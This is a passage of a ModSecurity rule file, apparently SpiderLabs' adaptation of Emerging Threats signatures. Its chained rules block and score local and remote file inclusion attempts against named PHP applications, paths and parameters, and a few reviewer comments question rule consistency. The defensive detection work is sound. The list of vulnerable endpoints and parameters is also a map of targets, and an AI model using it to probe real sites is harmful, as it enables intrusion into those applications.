"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dompdf dompdf.php input_file Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php lang_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /class.phpmailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011564,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php 
lang_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Classifieds class.phpmailer.php lang_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /content/dynpage_load.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynPage dynpage_load.php file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /oldnews_reader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PithCMS oldnews_reader.php lang Parameter Local File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011554,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jphone" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jphone Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011552) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /familynews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011552,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:current_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FCMS familynews.php current_user_id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011553) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /settings.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011553,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:current_user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FCMS settings.php current_user_id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_del.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011377,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS com_del.php class_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/file_manager/special.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011384,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
&TX:'/RFI.*ARGS:fm_includes_special/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MAXcms fm_includes_special Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011385) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011385,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_noticeboard" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla NoticeBoard Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011451,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jgrid" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla JGrid Component File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011453) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /maincore.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011453,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:folder_level "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Fusion maincore.php folder_level Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011454,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:db_servertype/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 4images global.php db_servertype Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /section.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011828,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS 724CMS section.php Module 
Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Module "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 724CMS section.php Module Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011829) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011829,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(1)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011830) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2) SecRule REQUEST_LINE "@contains /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011830,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion Attempt(2)',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyOWNspace getfeed.php file Parameter Local File Inclusion 
Attempt(2)',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011831) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/admin.lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011831,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:site_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CMS Board site_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011837,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2006-3930'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_live_site/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS A6MamboHelpDesk Admin.a6mambohelpdesk.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011843) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt SecRule REQUEST_LINE "@contains 
/baconmap/admin/updatelist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011843,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:filepath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BaconMap updatelist.php filepath Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011844) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_rwcards/rwcards.advancedate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011844,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_rwcards mosConfig_absolute_path Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011846,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains uniqcode=KPI" "chain" 
# Remaining links of the chain for rule 2011846; its starter is on the previous
# line of the file. Every link of a chain has to match. The last link tests one
# parameter and, on a match, adds tx.critical_anomaly_score to tx.anomaly_score.
SecRule REQUEST_LINE "@contains menu_no_top=performance" "chain"
    # NOTE(review): msg says Local File Inclusion, but the last setvar stores the
    # hit under the WEB_ATTACK/RFI key - confirm that is intended.
    # NOTE(review): t:urlDecodeUni, t:htmlEntityDecode and t:normalisePathWin are
    # listed on the chain starter only; this link names no transformations, so
    # what ARGS:uri is normalised with depends on SecDefaultAction - verify.
    SecRule ARGS:uri "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM uri Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011847) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /real_estate/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011847,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    # Plain substring test: the chain only continues when the request line
    # contains "GET ". NOTE(review): the same parameter sent with another method
    # is left to other rules - confirm that coverage exists.
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_jomestate" "chain"
    # &TX:'/regex/' counts the TX variables whose name matches the expression;
    # the link passes when at least one exists. Those variables are set elsewhere
    # (presumably by the generic RFI rules - confirm they are loaded before this file).
    SecRule &TX:'/RFI.*ARGS:task/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jomestate Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011853) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /news/search.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011853,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,44370'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # NOTE(review): msg describes Local File Inclusion, but this link only passes
    # when an RFI-named TX variable exists for ARGS:bn; there is no "../" test as
    # in the ARGS:uri chain above. Confirm which check was intended.
    SecRule &TX:'/RFI.*ARGS:bn/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS W-Agora search.php bn Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /bazar/picturelib.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011880,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt',tag:'web-application-attack',tag:'cve,CVE-2010-2315'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBazar picturelib.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /mw_plugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011881,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:IP/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics mw_plugin.php IP Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011882) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt
# The action string of this starter continues on the next line of the file.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011882,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File 
inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_action "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_action Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011883) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011883,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:owa_do "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Web Analytics owa_do Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011884) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/loadplugin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011884,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:load "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGaming CMS loadplugin.php load Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011935) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011935,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component joomlaXplorer admin.joomlaxplorer.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /admin/thumbnailformpost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011928,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adminlangfile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TFTgallery adminlangfile Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_banners/banners.class.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011929,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_banners banners.class.php Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011941) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /module.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains module=osTicket" "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Source Support Ticket System module.php Local File Inclusion 